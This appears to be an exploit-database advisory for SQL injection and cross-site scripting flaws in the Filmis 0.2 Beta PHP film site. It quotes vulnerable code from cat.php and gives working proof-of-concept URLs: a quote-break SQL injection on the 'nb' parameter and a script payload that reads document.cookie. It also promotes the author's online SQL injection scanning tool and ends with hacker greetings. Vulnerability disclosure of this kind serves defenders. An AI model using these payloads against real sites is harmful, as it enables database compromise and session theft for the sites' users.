75 lines
No EOL
1.4 KiB
Text
75 lines
No EOL
1.4 KiB
Text
===================================================================================
|
|
|
|
Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities
|
|
|
|
===================================================================================
|
|
|
|
# Exploit Title: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities
|
|
|
|
# Author: M.Jock3R
|
|
|
|
# USE MY ONLINE SQLI SCAN TOOL[CODED By ME] : http://dzcode.tk/sql.php (To discover that such exploit)
|
|
|
|
# Download Script(Official site): http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip
|
|
|
|
# Category:: webapps
|
|
|
|
# Tested on: windows XP Sp2 FR
|
|
|
|
|
|
|
|
===================================================================================
|
|
|
|
|
|
|
|
Vuln file : cat.php
|
|
|
|
|
|
|
|
Vuln Code :
|
|
|
|
----------
|
|
|
|
$idcat = $_GET['id'];
|
|
|
|
$nbitemparpage= "28";
|
|
|
|
if(@$_GET['nb']=="") { $nb = "1"; } else { $nb = $_GET['nb']; }
|
|
|
|
$nbd = ceil(($nb -1) * $nbitemparpage);
|
|
|
|
$amem = mysql_query("SELECT * FROM ".$prefix."film");
|
|
|
|
|
|
|
|
Exploit:
|
|
|
|
---------
|
|
|
|
1/SQL INJECTION :
|
|
|
|
http://localhost/filmis/cat.php?nb=-1'
|
|
|
|
|
|
|
|
2/XSS :
|
|
|
|
http://localhost/filmis/cat.php?nb=1><script>alert(document.cookie)</script>
|
|
|
|
|
|
|
|
===================================================================================
|
|
|
|
Greets To :
|
|
|
|
adelsbm / attiadona / Wprojects.tk
|
|
|
|
|
|
|
|
Email : madrido.jocker@gmail.com
|
|
|
|
|
|
|
|
THANKS TO ALL ALGERIANS HACK3RS
|
|
|
|
=================================================================================== |